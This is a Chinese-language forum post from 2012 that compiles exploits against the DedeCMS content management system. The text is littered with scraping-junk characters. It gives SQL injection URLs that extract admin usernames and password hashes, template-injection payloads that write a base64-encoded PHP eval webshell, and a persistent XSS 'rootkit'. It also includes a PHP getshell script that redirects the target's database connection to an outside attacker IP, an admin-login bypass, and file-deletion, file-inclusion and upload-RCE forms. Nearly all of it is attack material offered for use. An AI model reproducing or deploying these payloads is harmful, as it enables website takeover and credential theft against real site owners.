dedecms漏洞总结

admin · 发表于 2012-10-18 10:42:14

Dedecms 5.6 rss注入漏洞7 C6 X  z$ t) g
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=19 `- x# \2 O  J5 N, G: c/ ~0 s- _

3 K  `5 W2 G; A" p: @9 M$ P1 N$ Z# F. q: R/ V9 E7 y  s

4 j0 W7 ?: a* F5 N8 e# f" ]" e9 Y1 G# f8 S

, R) k; ~, \  T0 z5 N! n- A. o2 k2 Z; D; ~7 K. p# {/ @
2 p# D- U" g/ H3 M  C) F( K5 H
7 K0 @. o# c6 v! O1 Z! n
DedeCms v5.6 嵌入恶意代码执行漏洞
0 k% T/ F3 @* j. V' b+ e! G4 x注册会员，上传软件：本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}& {" [& k9 ^3 e. A3 E+ i
发表后查看或修改即可执行
! b' w3 X% J4 P: C/ z% na{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}& P! g7 n# v+ o
生成x.php 密码xiao，直接生成一句话。, n" P6 P: _, `, l$ R9 {  `) Y

- m! R6 T" Y/ _  `( n3 {% V" W- U' w, H0 @# T& J

2 ]+ S7 _! L& ]" _; z3 l+ w" G0 ^- O; l/ a- g; c
# ~6 j& g+ ?% E- u4 K

1 v3 t7 q% q9 O$ x; z! ]6 v+ e
, R; W$ B: O& B! U- ~
7 r. x( b5 H5 G% `, VDede 5.6 GBK SQL注入漏洞
1 }7 F9 i  }: S' |5 Ohttp://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';$ d+ r) ~- U: E- b! R
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞; n. x! j8 m. n. d1 G
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
: a% N" B' t" y: T' ~% a; z: [  f/ E4 M- _7 Z5 ~% i% p' X3 y4 J* Y2 T
8 m9 D2 U, F8 K' Y) ?2 I
# f# L% Z: M0 _% A$ i5 |
* F# X6 R5 D  M( K

3 v4 q9 K4 k, B! F' q0 H
& R  ]5 t9 m, O4 `DEDECMS 全版本 gotopage变量XSS漏洞4 ^4 \+ F! `# J* k7 j' n
1.复制粘贴下面的URL访问，触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞，需关闭XSS筛选器。 " z% n- m8 S$ z5 |, i8 N
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x=") K( t& V3 T8 U2 M9 B

1 }+ z, c; B, U7 F/ V5 e3 n/ b) w5 R7 d+ r
2.关闭浏览器，无论怎么访问下面的任意URL，都会触发我们的XSS。 ) }# P. |5 a! K, {) b
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda

http://v57.demo.dedecms.com/dede/login.php

color=Red]DeDeCMS(织梦)变量覆盖getshell
1 y1 v/ p/ l( l9 b0 U5 n3 X+ I3 A; R#!usr/bin/php -w
) \  Y! w7 v4 w/ F2 s<?php
) e2 Z8 f2 C0 R: K0 I$ ?error_reporting(E_ERROR);
( w( B: `( g' wset_time_limit(0);' z5 W, [% y! J6 c& ^
print_r('
4 T# u% B4 v- c+ m8 v# xDEDEcms Variable Coverage
" L& v# @. J  |. u$ a9 CExploit Author: www.heixiaozi.comwww.webvul.com
);
, s, `9 C7 }, x: T8 [' Techo "\r\n";, F( K* i7 s5 _; z5 m9 R8 \
if($argv[2]==null){2 g& T- B% s; g+ Y' ?: q
print_r('+ |; _! z0 D& ^5 A9 N
+---------------------------------------------------------------------------+8 j' s; q$ ^& ~7 E9 \
Usage: php '.$argv[0].' url aid path( x3 P) k. g/ @8 ~
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/: H' H/ E+ e2 Y; K8 Z, J& S% M
Example:: _  L& T4 ]  i8 |, E$ z  M
php '.$argv[0].' www.site.com 1 old
' [7 ~  n! Y  y, H+ [9 U+---------------------------------------------------------------------------+
8 Z6 }* G& t' O* J5 U+ Q- N');! i1 R) w$ T% p" I5 j; m
exit;
3 o! K1 A' M- {$ B. v5 O0 n! e}
9 R% c) @% e6 z7 b3 v$url=$argv[1];
8 B, H1 [5 }+ K- Q- q4 @+ i- F' j8 V" n$aid=$argv[2];
3 W) x2 o: a' i8 N8 t7 B, c$path=$argv[3];
8 B& ?9 X$ ^- a! B$exp=Getshell($url,$aid,$path);: Y! o. g7 T8 |  R0 U3 Q! ?+ j* ^
if (strpos($exp,"OK")>12){1 y1 }* c' F2 X: V
echo "& W  j$ C& {7 k
Exploit Success \n";6 e5 M9 Y- h3 D( Q0 r
if($aid==1)echo "
$ r3 u4 n  p! S4 t/ J, ]" \Shell:".$url."/$path/data/cache/fuck.php\n" ;/ Z9 ?8 Q) i1 b" G) S8 A9 @- ?+ b

2 \# [6 [+ t+ r& p8 c+ F( k& C+ N& V5 J! B1 E# W. ]7 L; e8 Q
if($aid==2)echo "
1 U8 r& T! w2 B2 |. L$ B/ cShell:".$url."/$path/fuck.php\n" ;
5 }! H8 j% h, V$ X3 l1 r9 c- f" _2 B2 C! Q) s- p$ t

3 D; Y3 F" I! q" Z8 G5 eif($aid==3)echo "5 `* ?' }  g; k8 W/ W
Shell:".$url."/$path/plus/fuck.php\n";
7 j& E: z; B5 y9 v
  w6 o2 L$ Y8 V+ d  p4 S, I' W# s4 b7 B8 U, m; o4 ]& L
}else{1 x5 N  A$ B% m
echo "
' Q' e+ R& B7 P  F$ TExploit Failed \n";
- j; A+ ?8 q1 y* Y- |5 k9 Q# G! j}
) C- i& M" R; C: G+ C# @5 \4 afunction Getshell($url,$aid,$path){- ?1 c& j( v7 Z8 Z6 v
$id=$aid;
! x% X+ ^3 }0 [7 b6 l  G7 w  m$host=$url;
1 R) Z& |3 S# L# O$port="80";% B6 M6 I1 _5 V6 n
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";% r% }; n" U1 a  s. ]6 r" y( p
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
; D! {8 R& o0 q0 b1 S" v7 ]$data .= "Host: ".$host."\r\n";
' b: }/ s4 f' x8 R) ~) a$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";$ m( X4 x) G% r+ Q+ t/ K
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";: b5 u9 b: Q; w
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
* X5 q! a  u; ~8 ^//$data .= "Accept-Encoding: gzip,deflate\r\n";4 O- ?; E6 a& X" I- T6 F% z5 s) e
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";; Y% n$ [# a* \0 ]. T- }( L
$data .= "Connection: keep-alive\r\n";
, o+ x3 E& f# E$data .= "Content-Type: application/x-www-form-urlencoded\r\n";/ ^- C2 V7 H( l5 a& y; B
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";$ w3 s  @% I  A) H* H6 q7 B) j
$data .= $content."\r\n";
) w, V+ P, J9 ~% l! j# z$ock=fsockopen($host,$port);
  _8 y8 e- H, w" y+ r8 fif (!$ock) {" W; X5 D) n9 `: w/ z  ]  r* }' l
echo ") ~4 L9 h: z2 a2 u
No response from ".$host."\n";, t6 _6 h5 J9 A$ R" |  D9 V! f/ r
}  E0 c& a9 x* O; b% _; B
fwrite($ock,$data);0 y4 x( i" [  R$ x3 T5 F
while (!feof($ock)) {
7 Z9 w0 n3 K. \1 x$ w, c2 o$exp=fgets($ock, 1024);$ q8 f9 x1 `/ p/ m# Y
return $exp;* [8 b+ m# `. f+ L( O# p. K
}/ ]- }$ b/ r! E2 d" f( L
}
8 S- w8 @! Q# d, @( ~, J% @- A4 R3 ~/ _
; ~% V. ?! [- C5 m
?>
2 j, t- M7 o1 ~8 _2 t
4 G, Q# d$ |8 S. n6 v9 W9 n- L* \& ^
8 [) |2 L+ ?6 t. K: j

- @7 m! L9 u) _
3 `; _4 i! ]5 \  G' d' K0 `4 X+ H: a. t8 e# i! a3 r+ d  w- ^& ~/ d

; u/ K% g" j9 Q' }7 \
3 i8 y& T4 R( @' F* B7 j1 C0 ~4 A. R) ]( j
* V" M9 \: X4 m" o
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)# y% g# |& J0 j& V1 H% P* I: }
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root% _. R* I. g! l5 |7 A
: a  D! b$ d8 n6 J/ V, R* r2 F" W

+ o$ `$ \. j" e$ {把上面validate=dcug改为当前的验证码，即可直接进入网站后台
& O+ T/ c- m- A  h# ?3 t
5 v6 f/ e9 M. p6 m& t: _1 p8 G. N
# k5 _# c6 I: p' }$ T( g此漏洞的前提是必须得到后台路径才能实现
5 _, S! w6 E: L. t( _0 b  T+ Q# f& @/ g
# W9 a- [" P+ L" A

6 {& [5 ]' h, v, L" H2 W; w0 v) @% I) \% I/ m1 z0 r2 D: G6 F
# s3 Q- c! j# x* i6 C1 K

8 M! o7 U" G: ~/ Y% n2 a9 J! E
: ]/ L! M1 s* ~) I, [& b& ?) `. Y: b( f# w4 T5 T' I2 [: ~

* t! ^: E- _4 k- a: [
. e' c4 @. x$ ~' I; N; q8 xDedecms织梦标签远程文件写入漏洞
+ @4 m# M6 t: m" i/ o& D! e% q: y前题条件，必须准备好自己的dede数据库，然后插入数据： insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
8 w8 `  ]. p8 n
+ g  X: V3 D7 ^, k' O% s; g6 g6 D6 y" n: R
再用下面表单提交，shell 就在同目录下 1.php。原理自己研究。。。 - p5 b( D8 m& R- a( H
<form action="" method="post" name="QuickSearch" id="QuickSearch">% S1 }4 i/ n9 ^  o( D7 R9 F
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
3 r- u, v8 V) H<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
9 C6 M/ P  x( u6 d' k! V% z<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
- a$ Y! j7 ?. k<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />. F* M/ s* U: n
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
9 j8 k, E# \7 h<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />" Z9 M5 _. P4 E& D: p3 a
<input type="text" value="true" name="nocache" style="width:400">) M/ K6 G1 ^" ^6 n
<input type="submit" value="提交" name="QuickSearchBtn"><br />
2 I6 Q% T' ]0 q9 J) ^</form>- y. n" z+ P1 p
<script>
, ?& u9 `9 ~8 E3 Q3 t% w: yfunction addaction(), }& u8 m. s, \' @: b) N$ f# P
{
4 \: [2 o( H, A- n8 ]( D$ h4 ?0 Udocument.QuickSearch.action=document.QuickSearch.doaction.value;: n% u2 d) ?9 T) ^& n
}( ]" h  J# v0 l9 a8 j. x  l+ y
</script>
" K0 e# H9 ?- Q3 X' Q. q* x$ Y- f; X7 s! c& y* T, f" b
4 w: W1 j+ h2 Y2 y8 B4 Q1 b
* R5 B" |& W. M; p

, s8 z* X8 b. n9 r! l
" J. o) x/ ^5 C# W
/ T/ G" F7 n1 p* w5 w' s) k- C# F+ K" }4 }3 f/ B6 E) U! w

  A2 |, ~8 W. q" h0 K4 k) q" I. i

, ^# z# A& Z9 f3 O* h7 JDedeCms v5.6 嵌入恶意代码执行漏洞
. G+ k) [8 W) _注册会员，上传软件：本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}，发表后查看或修改即可执行3 l5 ^, F) J6 S# W4 N- B0 a
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
. O* C$ \. F7 V& z. m' @生成x.php 密码：xiao直接生成一句话。密码xiao 大家懂得3 d9 ?" w2 q/ ]
Dedecms <= V5.6 Final模板执行漏洞5 ^7 S: z; W; A! J
注册一个用户，进入用户管理后台，发表一篇文章，上传一个图片，然后在附件管理里，把图片替换为我们精心构造的模板，比如图片名称是：
  g: U" s: |+ k2 _7 O! J. m% _, zuploads/userup/2/12OMX04-15A.jpg

- u+ J9 g8 n* v6 H. |  u1 x, i
4 t# f2 U/ p9 \3 J0 f2 ?2 }  X8 W; t模板内容是（如果限制图片格式，加gif89a）：% ?3 r( i6 K8 X3 }+ w+ X
{dede:name runphp='yes'}
; H) ^4 Z7 Y0 a$fp = @fopen("1.php", 'a');& a" F2 Z$ ^% {5 B. D
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
( \1 Y' F$ R/ I8 C@fclose($fp);- Z, w% j! z' o" \( Z, |
{/dede:name}7 v9 W2 y2 M$ a- m, B
2 修改刚刚发表的文章，查看源文件，构造一个表单：
. m: Q% }( L9 M  O8 O6 ~+ y<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
- c. `8 M$ V  m9 q<input type="hidden" name="dopost" value="save" />8 b: k' U' C; c
<input type="hidden" name="aid" value="2" />
, d% ~9 K  i& j<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
# x( k; c8 y% T- F6 H% }3 D<input type="hidden" name="channelid" value="1" />1 e  |; ~8 J5 P/ ^
<input type="hidden" name="oldlitpic" value="" />
, D& S+ j" ]7 Q9 p<input type="hidden" name="sortrank" value="1275972263" />& ?1 }: Q" B' C
( y9 `- e! L" p5 z
7 M9 k, v! D$ I* {
<div id="mainCp">
9 X/ ]2 J: _, z6 q) Q<h3 class="meTitle"><strong>修改文章</strong></h3>
- I* Z4 N5 E0 w5 h0 D! g% q! U1 }  H1 Y1 f- N

* R6 m* ]5 ^2 Q, D<div class="postForm">0 k* K* G6 Z) i6 c0 }
<label>标题：</label>
3 |- @4 y. j4 e" I<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
% U, c3 l" J( B7 n. d0 Z- }; A/ i

% {' e4 l6 x4 ?7 {  J7 L3 P<label>标签TAG：</label>
* c) c2 `& v9 J% ]: S3 \8 z4 d. L<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)! |, `0 a- m' a, ~( u4 N+ N
( ?  l6 t( _4 P$ ~) t* S% K

$ N7 A9 l2 d( r7 m4 \8 N$ W5 V! v<label>作者：</label>
% P" A. K4 b3 {- J" w<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
1 A% t8 q% s( U7 r0 t' u
- F, a  ?. F' x2 G
/ J- C# L8 w: r" X# t4 \<label>隶属栏目：</label>
7 R$ b: A1 H3 I" l<select name='typeid' size='1'>
6 ?! @, a  o, ?4 W# ]<option value='1' class='option3' selected=''>测试栏目</option>8 {% s( M$ T4 }, R6 B7 m: n
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
" \8 q6 g7 g/ k! w7 t: I$ g" H1 z8 a% v0 o  q, e: v+ H, U6 n2 n

9 h" ]1 w- z3 d6 D) L<label>我的分类：</label>( A* E3 f- |; J, x$ n6 J5 V
<select name='mtypesid' size='1'>: @7 [, G6 {% i3 J
<option value='0' selected>请选择分类...</option>
; q% @0 j5 l/ s% `<option value='1' class='option3' selected>hahahha</option>- u, Y7 [6 H5 e
</select>
6 ?: F* A% }% {$ z& y* L9 g8 H. s) t, ?

3 Q5 J  u$ A) q. x' A<label>信息摘要：</label>, t5 X3 q3 G) e& H
<textarea name="description" id="description">1111111</textarea>9 d2 m7 f! x* _
(内容的简要说明)( B0 d9 B6 J3 q" }: C0 x) _8 \; Y: G7 Y$ n
" M3 j/ @6 \  C/ q* w3 S, ~' L' m

3 G3 {7 o7 F; u<label>缩略图：</label>: E3 K- B) d, @5 Q; t
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
) D, D- I. x- A: A$ @
; G5 [7 ?1 X7 D9 L0 i  k& \& I7 b) v# L8 ^' T& G* A
<input type='text' name='templet'; ]+ g( b& b# V! y
value="../ uploads/userup/2/12OMX04-15A.jpg">
- z: D# @. T, m% `/ K<input type='text' name='dede_addonfields'5 y$ _$ B% K& M+ v1 k
value="templet,htmltext;">（这里构造）
% F  v4 P8 a4 J/ {& N8 y: t4 H</div>. E* D7 n9 k6 ~( Q( [9 R. R
: x( |: u3 q5 k+ j/ R

8 J% v& @$ {. a% w4 R# s0 o2 f# C1 E8 [* N5 ]/ k
<h3 class="meTitle">详细内容</h3>$ g8 a" \" x& p5 K3 A) R

  ]2 r+ ], B9 X5 ]/ m; D$ N6 T: M/ _1 P4 J
<div class="contentShow postForm">
, E. R1 G1 h; ?$ S  ?<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>* ~8 `9 R5 A' ^$ B3 J) ^# T
" A0 |! R6 y. _6 l5 c. O
7 f( l# L9 R; d4 c0 @, z5 U6 g
<label>验证码：</label>3 d& T" T9 U- W$ d: g
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />+ k0 s# ~& T' p
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清？点击更换" align="absmiddle" style="cursor:pointer" />
! z% e  E3 d* H% }9 p! }$ M& X. s6 x( ^5 \; @( X
1 _# s1 H$ V; T% u) P# h' `
<button class="button2" type="submit">提交</button>( @( S* m1 V2 i  F( y
<button class="button2 ml10" type="reset">重置</button>3 U( r2 {8 Q, ?2 c: ]9 x7 y  T
</div>* W1 Q" Q  ^3 Y$ p, }  \" ]1 ]" b
" w8 c& {; Q$ }2 M
+ h4 B" ~+ U/ {& U2 Q+ T
</div>
7 [4 q, S0 j9 A" w" A
9 a7 x. z  N: m" P4 b
& D% v4 N+ ~' j, ~2 B( ~</form>
, P5 l/ g8 n& @  a$ X/ a6 L
  w' _& L. e7 i8 S- i( e3 [( ]! C( O" j# S, u2 h9 k0 W
提交，提示修改成功，则我们已经成功修改模板路径。 3 访问修改的文章：  e2 T+ _. w$ Z1 p2 b
假设刚刚修改的文章的aid为2，则我们只需要访问：8 Q9 G- \8 T: K: {
http://127.0.0.1/dede/plus/view.php?aid=2
即可以在plus目录下生成webshell：1.php
+ [" l  A& D) `2 k
: A2 v* @  P" l% ^) V) s& g  V( w+ v9 c/ C
6 R- J( i$ r  t# x! t; E

; w  z* g4 R- |, d9 c
) s  ?" g" z( t) D8 b
. J: v# ~1 e( X0 w% P& S6 l6 T- H$ t3 J; b# d! Y

3 N/ R  w7 o  t& H  |5 w5 T$ j7 o' n6 d4 }2 H' Q# p3 W
4 u2 r6 _; @: e& D: i; h5 h( G
$ Z8 n" t, a. B% q: w" X  B4 g
- `4 p( a. b/ o5 R
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
" d/ e! G1 m9 Y1 ~Gif89a{dede:field name='toby57' runphp='yes'}
0 @8 j0 P' L; C( W: B, c6 o# hphpinfo();$ ~0 R8 c3 @( ^3 ~3 Q9 T+ W3 U
{/dede:field}3 K2 w8 D3 l: l3 ~' S/ x# y. d
保存为1.gif* E& `& U9 O: C$ ?& C& V# t
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> : e2 C, p3 Z+ w2 i$ ]
<input type="hidden" name="aid" value="7" />
9 D! @& i4 A$ x<input type="hidden" name="mediatype" value="1" />
$ h  e. y, q' e% V( U- Q<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> + M$ _% f) T) ^2 R0 w4 O- J
<input type="hidden" name="dopost" value="save" />
/ U+ F; X5 l; K6 H0 h9 U( L<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
. L" T# E; E4 z8 e9 K<input name="addonfile" type="file" id="addonfile"/>
! [! R3 ?: `1 d( N<button class="button2" type="submit" >更改</button>
4 F# S" v1 F1 G! O, l; C</form>
8 t0 W! ^! E' E  c1 o6 N
; O4 v2 r- j2 A( c# g( @7 X7 ?% f4 G4 B9 o* o' z) L; o
构造如上表单，上传后图片保存为/uploads/userup/3/1.gif' E% y1 }. l6 h9 ^. O
发表文章，然后构造修改表单如下：
9 ], a; H6 Z$ ]8 d" Z  U2 f0 ]4 V1 U% [( j7 |3 d5 N

  g! _+ t) c0 W<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
1 t' h7 |$ J( L<input type="hidden" name="dopost" value="save" />
& I5 c- j) r- ]' D4 S: k<input type="hidden" name="aid" value="2" />
7 D3 t4 Q2 o5 \' h5 ~<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" /> 4 O4 y' @! F* U2 p
<input type="hidden" name="channelid" value="1" />
) R& U# d  w* a( |<input type="hidden" name="oldlitpic" value="" />
1 V- L5 z7 q& E! M9 ~) j<input type="hidden" name="sortrank" value="1282049150" /> & w, @- `/ Q8 r- t: [
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> 6 Q0 i, [8 M. ^
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
' n& l; N6 P* |# h<select name='typeid' size='1'> 6 d# v+ O/ ^$ w+ @2 l& I
<option value='1' class='option3' selected=''>Test</option>
3 i% O9 w, A* f1 _. A; `<select name='mtypesid' size='1'>   f$ C3 d; }* N& f$ M. i' }2 i! p
<option value='0' selected>请选择分类...</option>
; N' Q1 u  O5 c! H5 l3 G<option value='1' class='option3' selected>aa</option></select> 6 p9 x. d* E2 o" ]8 _: I
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
! f+ ~/ a& Q! i5 G; l<input type='hidden' name='dede_addonfields' value="templet">
" O. g1 z2 Q1 p7 j<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
6 ^5 V, H3 \8 }) {( q! q: Z% u<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
' ?# P% ~8 L  s  f$ _) x6 Z" _<button class="button2" type="submit">提交</button>
1 \2 h4 Y. T# T</form>  ]/ i& ^* q0 G5 b

( k# R$ {  h/ {& j: m
4 ]' t3 o" r' E# ^
; h* `/ B3 E+ F$ ?% J8 y
9 ~: O4 R9 W" J( `  n7 q2 f3 H' {3 U
% ?8 H: |! k* \% R1 j5 Z6 H
3 _2 x# m! j- ~9 u4 v2 _2 J  V- S! Q! n7 {
; _: R: z7 x; \  N; m4 S9 ^
$ M$ n7 V: O, }: F% g5 c3 n0 A) r

: T0 B# l& s8 S1 _( F, }$ I2 U
& G  F! u1 W, f4 w0 [5 [4 o2 r- R* Z: [0 i: {4 d
织梦(Dedecms)V5.6 远程文件删除漏洞0 u; J6 _1 g0 T  e2 q! G
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
' F; K5 A$ W/ G8 Qhttp://www.test.com/plus/carbuya ... urn&code=../../
  `& H2 g9 O7 l, f; l- N5 H2 x' L; t

) `! y2 ?) E5 y4 a  d
5 a" f1 B% K: i' t- a! G3 d9 L" e2 h$ m  I9 J
% y) T+ D3 h: M# a4 E
+ [) r% n9 u- K. g1 e) W3 y

: }8 O# Z- d: {6 B* F3 t
9 E* q1 M5 K# T- x' P0 M& `9 B. M& i; ~# M; l# f, \% l

; z7 Y% i4 a, @* {/ QDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
( U4 i( w3 ?; Vplus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`( N7 G" B- w8 f  a
密码是32位MD5减去头5位，减去尾七位，得到20 MD5密码，方法是，前减3后减1，得到16位MD5
* J; f) D7 D6 x6 e9 h' ~  U# U4 G
2 w4 m$ p& `2 r* H% ]2 a) p7 P' Z1 c/ R: p7 E. Q; r
5 }% ^0 G+ ]; A& m$ }3 \; s

& Z' j! |# y- Q) X
! R9 x& N4 R; K' h- w% i4 R3 W0 D7 e, ^, }
9 R+ v0 u8 [. {8 q' r* O

/ p* ^' e+ ~8 ]7 G0 W$ r( i; D$ W7 ^+ K4 |3 F9 F* I3 ~" q: B! \
" Q9 h, _- n3 w0 P" L9 Z7 Z
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞0 M; A7 p1 b+ F$ b, h+ Q% {
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
% ?; t2 W6 W# N* v( p
6 ^3 C0 ~* J1 o  G1 A  E
  w1 t! P4 E8 H/ S
0 o% ]8 y1 V) ^6 x
( o1 C  T4 D; d$ z2 u1 q- T
4 t& o1 x8 X9 j& P6 t" ]" \: }; s7 W9 ]6 k, @! c

, g1 ~+ |, M+ s* ~$ W5 V, N- K, G' `$ W/ G

* G) ^% [6 k+ i9 K  \% {( \
3 i, ~. ?* k! ?织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
; s" w3 _! }/ R<html>
$ U& I3 s2 K1 u* `<head>
$ e4 y. M. b7 @+ |! M* E/ [+ }- _<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
2 s; e9 T( v- A4 I# r1 ?% g</head># S! T5 t5 q! t1 m
<body style="FONT-SIZE: 9pt">
4 Z  H- i, d; K8 O4 A$ Z0 ]2 [* J---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />  z- D7 E$ i4 Q! W' x
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
  {5 [  }/ }# M. B<input type='hidden' name='cfg_basedir' value='../../' />  t5 r# Z& O8 t" @0 C$ V' Z$ H
<input type='hidden' name='cfg_imgtype' value='php' />
' W) y. }, }# I5 ]<input type='hidden' name='cfg_not_allowall' value='txt' />" N3 v- t9 Z9 W, a+ R% D1 w
<input type='hidden' name='cfg_softtype' value='php' />1 K: {% A/ }2 i
<input type='hidden' name='cfg_mediatype' value='php' />
" V3 ~" w9 Z4 G* U+ e<input type='hidden' name='f' value='form1.enclosure' />) F8 F& X3 L7 ?
